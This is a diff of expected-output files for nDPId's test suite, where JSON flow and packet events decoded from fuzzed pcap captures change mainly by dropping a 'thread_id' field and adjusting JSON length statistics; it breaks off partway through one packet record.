00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854565449,"pkt":"AFCLk5MlcwAgsl17CABFAAAoxN1AAEAGF7isFAMNrBSUBQBQCjDK9viB5V53aFEQgywIrgAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854565449,"pkt":"AFCLk5MlcwAgsl17CABFAAAoxN1AAEAGF7isFAMNrBSUBQBQCjDK9viB5V53aFEQgywIrgAA"}
00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565547,"flow_last_seen":1031854565547,"flow_idle_time":600000,"flow_min_l4_payload_len":507,"flow_max_l4_payload_len":507,"flow_tot_l4_payload_len":507,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1031854565547,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","l4_proto":115,"flow_datalink":1,"flow_max_packets":3} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565547,"flow_last_seen":1031854565547,"flow_idle_time":600000,"flow_min_l4_payload_len":507,"flow_max_l4_payload_len":507,"flow_tot_l4_payload_len":507,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1031854565547,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","l4_proto":115,"flow_datalink":1,"flow_max_packets":3}
01119{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1031854565547,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1031854565547,"pkt":"AFCLk5N8CAAgsl17CABFAAIPxN5AACVzANCsFAMNrBQDBQBQCjDK9pOB5V53aFAYgywfUQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3htbA0KQ29udGVudC1MZW5ndGg6IDM1OA0KRGF0ZTogVGh1LCAxMiBTZXAgMjA0MiAxODoxNjowNTBHTVQNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+DQo8IURPQ1RZUEUgcGFwIFBVQkxJQyAiLS8vV0FQRk9SVU0vL0RUlCBQQVAgMS4wLy9FTiIgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+DQo8cGFwPg0KPFplc3VsdG5vdBBmaWNhdGlvbi1yZXNwb25zZSBwdXNoLWlkPSIxODkPMDFfMTAzMTg1NDU2MjQ4Ml8xMDM4QGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQiIGNvZGU9IjEwMDAiIGRlc2M9Ik9LIj4NCjxhZGRyZXNzIGFkZKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01119{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1031854565547,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1031854565547,"pkt":"AFCLk5N8CAAgsl17CABFAAIPxN5AACVzANCsFAMNrBQDBQBQCjDK9pOB5V53aFAYgywfUQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3htbA0KQ29udGVudC1MZW5ndGg6IDM1OA0KRGF0ZTogVGh1LCAxMiBTZXAgMjA0MiAxODoxNjowNTBHTVQNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+DQo8IURPQ1RZUEUgcGFwIFBVQkxJQyAiLS8vV0FQRk9SVU0vL0RUlCBQQVAgMS4wLy9FTiIgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+DQo8cGFwPg0KPFplc3VsdG5vdBBmaWNhdGlvbi1yZXNwb25zZSBwdXNoLWlkPSIxODkPMDFfMTAzMTg1NDU2MjQ4Ml8xMDM4QGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQiIGNvZGU9IjEwMDAiIGRlc2M9Ik9LIj4NCjxhZGRyZXNzIGFkZKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00370{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":130,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854568982,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxOJAl0AGF7OsFAMNrBQDBQBQCi7Kxgh65UF0ElARgyyXWQAA"} 00356{"packet_event_id":1,"packet_event_name":"packet","packet_id":130,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854568982,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxOJAl0AGF7OsFAMNrBQDBQBQCi7Kxgh65UF0ElARgyyXWQAA"}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":130,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1031854568982} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":130,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1031854568982}
00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854489004,"flow_last_seen":1031854494143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":840,"flow_tot_l4_payload_len":1156,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854489004,"flow_last_seen":1031854494143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":840,"flow_tot_l4_payload_len":1156,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -216,6 +216,6 @@
~~ total memory freed........: 4746874 bytes ~~ total memory freed........: 4746874 bytes
~~ total allocations/frees...: 101424/101424 ~~ total allocations/frees...: 101424/101424
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 215 chars ~~ json string min len.......: 201 chars
~~ json string max len.......: 2426 chars ~~ json string max len.......: 2426 chars
~~ json string avg len.......: 1320 chars ~~ json string avg len.......: 1313 chars

272
test/results/fuzz-2020-02-16-11740.pcap.out
View File

@@ -10,8 +10,8 @@
01324{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1528996068129,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528996068129,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIMdAAP8RAAAKDEAexuIZNXIQBxQClwAAAQsCj4S+BLJeRUI2j+crsJkatvQaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUiUAGgkAADghDQM2NwZbIqDkATUwMzExNDgwMjcxNTE2NDgwQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZmMtZGItYjMtMDgtZmYtMTQeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYjFkMWEwMjI1YiwgNWIyMmEwZDEvZmM6ZGI6YjM6MDg6ZmY6MTQvMjA1BAasFAEQIA5WWldDMlRlc3RsYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TwoCAgAIFwwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARMVBoQAAAlAAoKU3RhbmQ5cmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAGCESD0ludmFsQmQgVmFsdWUaHQAAOCETFzQwLjgwNDg4JQAtNzQuMTAyODNVVxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVAS3TFDXZx6RcHx5Q8nnMq0Ng=="} 01324{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1528996068129,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528996068129,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIMdAAP8RAAAKDEAexuIZNXIQBxQClwAAAQsCj4S+BLJeRUI2j+crsJkatvQaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUiUAGgkAADghDQM2NwZbIqDkATUwMzExNDgwMjcxNTE2NDgwQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZmMtZGItYjMtMDgtZmYtMTQeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYjFkMWEwMjI1YiwgNWIyMmEwZDEvZmM6ZGI6YjM6MDg6ZmY6MTQvMjA1BAasFAEQIA5WWldDMlRlc3RsYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TwoCAgAIFwwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARMVBoQAAAlAAoKU3RhbmQ5cmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAGCESD0ludmFsQmQgVmFsdWUaHQAAOCETFzQwLjgwNDg4JQAtNzQuMTAyODNVVxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVAS3TFDXZx6RcHx5Q8nnMq0Ng=="}
00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068129,"flow_last_seen":1528996068129,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528996068129,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996068129,"flow_last_seen":1528996068129,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528996068129,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1528996068284,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":257,"pkt_l4_len":223,"thread_ts_msec":1528996068284,"pkt":"ABRP+4rqcNuYVcUnCABFAADz7eFAAPwRZdbG4hk1CgxAHgcUchAA39JxAwsA1+U\/DuIEVKatp1a5Vz8iUQkBNTAzMTE0ODAyNzE1MTY0ODBAd2xhbi5tbmM0ODAubaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1528996068284,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":257,"pkt_l4_len":223,"thread_ts_msec":1528996068284,"pkt":"ABRP+4rqcNuYVcUnCABFAADz7eFAAPwRZdbG4hk1CgxAHgcUchAA39JxAwsA1+U\/DuIEVKatp1a5Vz8iUQkBNTAzMTE0ODAyNzE1MTY0ODBAd2xhbi5tbmM0ODAubaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
01295{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":5,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528996068284,"pkt":"AAAMqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01281{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528996068284,"pkt":"AAAMqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":5,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528996520702} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":5,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528996520702}
00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1528996520912,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528996520912,"pkt":"AFFP+4rqcNuYVcUnCABFAADh9PZAAPwRXtPG4hk1CgxAHgcUchAAzf\/ACwwAxUX8kZJ5SD1GIY9b3TLnaCUBNTAzMTEjODAwNzM2MzgwNzJAd2xhbi5tbmM0MDAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEwZmQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjA2T0oBAgBIFwEAAAEFAACzfR5W9eh2OghNxDwVbojaAgEAABPTIXEVtgAALhLyMDDdAueLAQACCwUAJQD\/wh144KSIGN1E2YBCoTFQEji6recwpo2EGDX0tsWSQ1s="} 00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1528996520912,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528996520912,"pkt":"AFFP+4rqcNuYVcUnCABFAADh9PZAAPwRXtPG4hk1CgxAHgcUchAAzf\/ACwwAxUX8kZJ5SD1GIY9b3TLnaCUBNTAzMTEjODAwNzM2MzgwNzJAd2xhbi5tbmM0MDAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEwZmQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjA2T0oBAgBIFwEAAAEFAACzfR5W9eh2OghNxDwVbojaAgEAABPTIXEVtgAALhLyMDDdAueLAQACCwUAJQD\/wh144KSIGN1E2YBCoTFQEji6recwpo2EGDX0tsWSQ1s="}
00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996521324,"flow_last_seen":1528996521324,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528996521324,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1796,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996521324,"flow_last_seen":1528996521324,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528996521324,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1796,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01361{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1528996521324,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528996521324,"pkt":"AAAMB6xAABRP+4rqCABFAALHIMlAAP8RAAAKDEAexuIZNXIQBwQCswAAAQ0CqzlVBXH\/qH48qbcRRfwKWygaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMyNwZbIqKpATUwxjExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3Bwbhp0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTBVLWE3LDQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBTUAAAAIGjEAAAAJ